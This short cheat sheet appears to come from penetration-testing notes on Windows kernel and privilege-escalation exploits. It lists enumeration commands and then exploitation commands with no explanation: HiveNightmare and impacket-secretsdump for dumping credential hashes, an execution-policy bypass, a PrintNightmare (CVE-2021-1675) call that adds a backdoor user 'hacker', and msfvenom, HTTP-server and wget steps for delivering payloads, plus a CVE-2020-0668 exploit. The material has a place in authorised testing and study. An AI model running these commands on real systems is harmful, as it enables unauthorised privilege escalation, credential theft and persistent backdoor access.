16.Kernel-exploits
Enumeration Commands
systeminfo
wmic qfe list brief
Get-Hotfix
icacls
whoami /priv
ls \\localhost\pipe\spoolssExploitation Commands
HiveNightmare.exe
impacket-secretsdump
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
msfvenom
python3 -m http.server <port>
wget http://<ip>:<port>/<file>
CVE-2020-0668.exe <source> <destination>
copy /Y <source> <destination>
msfconsole -r <resource_file>
net start MozillaMaintenanceVerification Commands
Last updated